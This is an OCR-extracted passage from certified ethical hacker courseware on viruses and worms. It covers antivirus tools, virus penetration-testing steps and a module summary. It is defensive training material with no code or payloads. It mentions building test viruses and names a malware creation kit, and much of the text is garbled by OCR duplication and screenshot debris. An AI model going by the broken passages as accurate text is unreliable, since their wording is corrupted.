Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses and Worms
Exam 312-50 Certified Ethical Hacker
Companion Antivirus: Immunet
C EH
■Immunet 1
A
Community 2.478,268 people protected
Community! <2 I 1My community |
-olt I
Greph
I Motires || t-njneiCoT i-niritrNofices
Product
Compu Compute terl rl
5 n or1tV •nm:.
SOT.. T..
■Summary
■Immunet 1□P9*VCCt> ^ I j ili l f
Histor^^^
■ 1 DtUledHfctory (
Scan
Cuera-^v*■ j
I a«t sranrxvl sranrxvl 10yS/20126:46:50PM
)
j
Scan Complete
I
Res Seamed:
Maximize Y iy Br
203228
Threars Defected:
Uoorade to i mmunet Plus 3.0 and you wiHr ecove: ^ AnWr\js81Anawywj(fl •EmailDa'jbaw Sunt Sunt I
306 306
Threats Removed:
•AdvancedRootkitRemoval •Enhan • EnhancedComota Thd *Offlin ineprotection •Technical Suptwt I
396
llapsed lime:
^ »J TaT
owKjn h«convi*1K!. 1hr«att wwe detected and j YcU an*c
0:4 :49
|
Scan History |
htt p:// p:/ / www.immunet.com Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited.
C o m p a n i o n A n t iv iv ir i r us us : I m m u n e t Source: http://www.immunet.com Companion Antivirus means that Immunet is compatible with existing antivirus solutions. Immunet adds an extra, lightweight layer of protection for greater peace of mind. Since traditional antivirus solutions detect on average only 50% of online threats, most users are under pro tected, whic h is why every PC PC can can b enefit fro m Immunet's essential essential layer of security. security. Immunet Protects detection power relies on ETHOS and SPERO, the heuristics-based engine and the cloud engine. Users of the Plus version also benefit from a third engine called TETRA, which provides provides prot ection when not connected connected to the Internet. Internet.
Module 07 Page 1102
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses and Worms
■ImmunGtlO
Exam 312-50 Certified Ethical Hacker
$d ,
FIGURE 7.33: Immunet Screenshot
Module 07 Page 1103
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses and Worms
Exam 312-50 Certified Ethical Hacker
A nti-virus Tools Tools
CEH
Urt1fw4
AVG Antivirus
F-Secure Anti-Virus
http://free . avg. com
h t t p : / / w w w . f s e c u r e , co m
BitDefender
Kaspersky Anti-Virus ' 12/
M
.
http://www.kaspersky.com
Trend Micro Internet Security Pro h t t p : / / a p a c . . t r e n d m i c r o . c o m
http://www. avas t. com
McAfee AntiVirus Plus 2013
i L
1
E
Norton AntiVirus
!y 9 |
h t t p : / / w w w . sy m a n t e c . c o m
lUtbM
Avast Pro Antivirus
N
h t t p : / / w w w . b i t d e f e n d e r , c o m
ilhi ul
http://home.mcafee.com
ESET Smart Security 6 http://www.eset.com
Total Defense Internet Security Suite http://www.totaldefense.com
Copyright Copyright © by E &Coi ncil . All Rights Reserved. Reproduction is Strictly Prohibited.
A ntivirus Tools Tools An tivi ti vi ru s tool to ol s pr even ev ent, t, detec de tec t, and rem ov e vir uses and o th er mal ic io us code co de fr om your system. These tools protect your system and repair viruses in all incoming and outgoing email messages and instant messenger attachments. In addition, these tools monitor the network's traffic for malicious activities. A few antivirus tools that can be used for the purpose of detecting and killing the viruses in the systems are listed as follows: 0
AVG AVG Antiv irus available at http://free.avg.com
0
BitDefender available available at http://www.bitdefender.com
0
Kaspe Kaspersky rsky Anti -Virus available at http://www.kaspersky.com
0
Trend Micr o Int ern et Security Security Pro Pro available at http://apac.trendmicro.com
0
Norton Anti-Virus available available at http://www.svmantec.com
0
F-Se F-Secure cure Anti -Viru -Viru s available at http://www.f-secure.com
0
Avast Pro Antivi rus available at http://www.avast.com
0
McAf ee Anti -Virus Plus Plus 2013 available at http://home.mcafee.com
0
ESET Smart Secur Secur ity 5 avail able at http://www.eset.com
0
Total Defense Defense Inte rn et Securit Securit y Suite available at http://www.totaldefense.com
Module 07 Page 1104
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses and Worms
Exam 312-50 Certified Ethical Hacker
Mo M o d u l e Flow
C EH
T y p e s
o f
V ir u s e s
C o m p u te r W o rm s
C o u n t e r -
M a lw a r e
m e a s u re s
A n a l y s is
Copyright © by R-Cm B C I . All Rights Reserved. Reproduction Reproduction is Strictly Prohibited. Prohibited.
M odule Flow Flow Penetration testing must be conducted against viruses and worms, as they are the most widely used means of attack. They do not require extensive knowledge to use. Hence, you should conduct pen testing on your system or network before a real attacker exploits it
Virus and Worms Concept
^ •
Ty p es o f Vi r us es
y — y—
Computer Computer Worms
—
Malw are Analysis Analysis
Co u n t er m eas u r es
^ Z ) Penetration Testing Testing
This section provides insight into virus and worm pen testing.
Module 07 Page 1105
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking Hacking and Counte rmeasu res Viruses and Worms
Exam 312-50 Certified Ethical Hacker
Pe n etration etration Testing Testing for V iru s
CEH CEH
Install an anti-virus program on the network infrastructure and on the end-user's system Update the anti-virus anti-virus software to update your virus database of the newly identified viruses Scan the system for viruses, which helps to repair damage or dele te files infected with viruses
4 v i\ \
m J
m
VIRUS .
Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited.
P ene tration tration Te sting st ing fo forr V iruses ir uses Since you are an expert Ethical Hacker and Penetration Tester, the IT director instructs you to test the network for any viruses and worms that could damage or steal the organization's information. You need to construct viruses and worms and try to inject them in a dummy network (virtual machine) and check whether they are detected by antivirus programs or able to bypass the network firewall. As a pen tester, you should carry out the following steps to conduct a virus penetration test: Stepl: Install an antivirus program You should install an antivirus program on the network infrastructure and on the end-user's system before conducting the penetration test. Step2: Update the antivirus software Check whether your antivirus is updated or not. If not, update your antivirus software. Step3: Step3: Scan Scan th e sy stem fo r viruses You should try to scan your target system; this will help you to repair damage or delete files infected with viruses.
Module 07 Page 1106
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses and Worms
Exam 312-50 Certified Ethical Hacker
Penetr Pe netration ation Testing fo forr Virus Virus CEH (C on t’d) t’d) > System is not infected
Set the anti-virus to
quarantine or delete the virus
Virus is removed?
>
System is safe
IX
V ____ Go to safe mod e and
delete the infected file manually
Set the anti-virus software to compare file contents with the known computer virus signatures, identify infected files, quarantine and repair them if possible or delete them if not Ifthe virus is not removed then go to safe mode and delete the infected file manually
Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited.
P en etration Te sting sting for V iruses (Con t’d t’d) Step4: Step4: Set Set the antivirus to quaran tine or delete th e virus Set your antivirus software to compare file contents with the known computer virus signatures, identify infected files, quarantine and repair them if possible, or delete them if not. Step5: Step5: Go Go to safe mode and d elete the in fected file m anually Ifthe virus is not removed, then go to safe mode and delete the infected file manually.
Module 07 Page 1107
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses and Worms
Exam 312-50 Certified Ethical Hacker
P en enet etra ratio tionn Testing Testi ng for Virus £ £H (C on t’d) t’d)
Use tools such as What's Running Running and Winsonar
Use tools such as SrvManand ServiWin
services
Use tools such as Starter, Security AutoRun, and Autoruns
Scan for startup programs
Scan for files and folders integrity
<■
| itkiul tUtkm
9
Scan the system for running running processes, registry entries, startup programs, files and folders integrity and services
Q
If any suspicious process, registry entry, startup program or service is discovered, check the associated executable files
0
Collect more information about these from publisher's websites if available, and Internet
0
Check the startup programs and determine if all the programs in the list can be recognized with known functionalities
Use tools such as jv l6 Power Tools Tools 2012 2012 and Reg Organizer
Scan for Windows
UrtifM
Check the data files for modification modificati on or manipulation by opening several files and comparing hash value of these files with a pre-computed hash
Use tools such as FCIV, TRIPWIRE, and SIGVERIF
Copyright © by EC-Cauactl.All Rights Reserved. Reproduction Reproduction is Strictly Prohibited. Prohibited.
P en etration T esting for V iruses (Con t’d t’d) Step 6: Scan the system for running processes You should scan your system for suspicious running process. You can do this by using tools such as What's Running, HijackThis, etc. Step7: Step7: Sca Scan th e system fo r suspicious registry entries You should scan your system for suspicious registry entries. You can do this by using tools such as JV Power Tools and RegShot. Step8: Scan the system for Windows services You should scan suspicious Windows services running on your system. You can do this by using tools such as SrvMan and ServiWin. Step9: Scan the system for startup programs You should scan your system for suspicious startup programs running on your system. Tools such as Starter, Security AutoRun, and Autoruns can be used to scan the startup programs. Step 10: Scan the system for files and folders integrity You should scan your system for file and folder integrity. You can do this by using tools such as FCIV, TRIPWIRE, and SIGVERIF.
Module 07 Page 1108
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses and Worms
Exam 312-50 Certified Ethical Hacker
Penetr Pe netration ation Testing fo forr Virus Virus (C on t’d) t’d)
Scan for modification to OS files
Use tools such as FCIV and TRIPWIRE
v
Document all the findings
0
Check Check the critical critical OS file modification or manipulation using tools such such as TRIPWI RE or manually comparing hash values if you have a backup copy
0
Document all all your findings in previous steps; it helps in determining the next action if viruses are identi fied inthe system
8
Isolate infected system from the network immediately to prevent further infection
t)
Sanitize the complete system for viruses using an updated anti-virus
Find other anti-virus solution to clean viruses
Isolate the machine from network
Update and run antivirus
Copyright © by EC-Cauactl.All Rights Reserved. Reproduction Reproduction is Strictly Prohibited. Prohibited.
P en etration T esting for V iruses (Con t’d t’d) Step Step 11: 11: Sca Scan th e system fo r critical OS modifi cation s You can scan critical OS file modifications or manipulation using tools such as TRIPWIRE or manually comparing hash values if you have a backup copy. Step 12: Document all findings These These findings can can help you deter min e the next action if viruses viruses are are id entif ied on the system. Stepl3: Isolate the infected system Once an infected system is identified, you should isolate the infected system from the network immediately in order to prevent further infection. Stepl4: Sanitize the complete infected system You should remove virus infections from your system by using the latest updated antivirus software.
Module 07 Page 1109
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses and Worms
Exam 312-50 Certified Ethical Hacker
M odu odull e Sum m ar aryy □
| 0
Virus is a self-replicating pr ogram that produces its own code by attaching copies of itself itself into other executable executable codes whe reas worm s are malicious malicious programs that replicate, replicate, execute, execute, and spread across the netw ork connections independently withou t human interaction
□
Some viruses affect computers as soon as their code is is executed executed;; other viruses lie dormant until a pre determine logical circumstance is met
□
Viruses are categorized categorized according according to file they infect and the way they work
□
Lifecycle of virus and worms include designing, designing, replication, replication, launching, launching, detection, incorporation and elimination stages
□
Computer gets infected infected by Virus, Virus, worms and other malware due to not running running the latest anti-virus anti-virus application, not updating and not installing installing ne w versi ons of plug-ins, plug-ins, installing the pirated softw are, opening the infected e-mail e-mail attachments or downloading files withou t checking properly for the source
□
Several virus and worm developmen t kits such as as JPS Virus Maker are availa ble in wild that can be used create malware with out any technical technical knowledge
□
Virus detection methods include system scanning, scanning, file integrity checking and and monitoring OS requests
□
Virus and worm countermeasu res include installing installing anti-virus anti-virus software and following anti-virus anti-virus policy for safe computing
-
M o d u le le S u m m a ry ry
© A virus is is a self -repl icat in g pro gram th at produ ces its own c ode by attachin g copies of itself into other executable codes, whereas worms are malicious programs that replicate, execute, and spread across the network connections independently without human interaction. © Some viruses affec affec t com put ers as soon as as th eir code is executed; ot her viruses lie dormant until a pre-determined logical circumstance is met. © Viruses iruses are categorized categorized according to file they infect and and the way they work. © The lifecycle of virus and wor ms includ e designing, replicati on, launching, detect ion , incorporation, and elimination stages. © A com put er get gets s infected by viruses, viruses, worms, and other m alware due to n ot running the latest antivirus application, not updating and not installing new versions of plug-ins, installing pirated software, opening infected email attachments, or downloading files with out checking checking prop erly for the source source.. © Several Several virus and wor m d eve lo pm ent kits such such as as JPS Virus Maker are available in the wild that can be used create malware without any technical knowledge.
Module 07 Page 1110
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses and Worms
©
Virus Virus
detect ion
Exam 312-50 Certified Ethical Hacker
metho ds
incl ude
sys tem
scanning , file
int egri ty
checking,
and
monitoring OS requests. ©
Virus and wor m co unt ermeasures include installing installing antivirus software and and following antivirus policies policies for safe safe computing .
Module 07 Page 1111
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.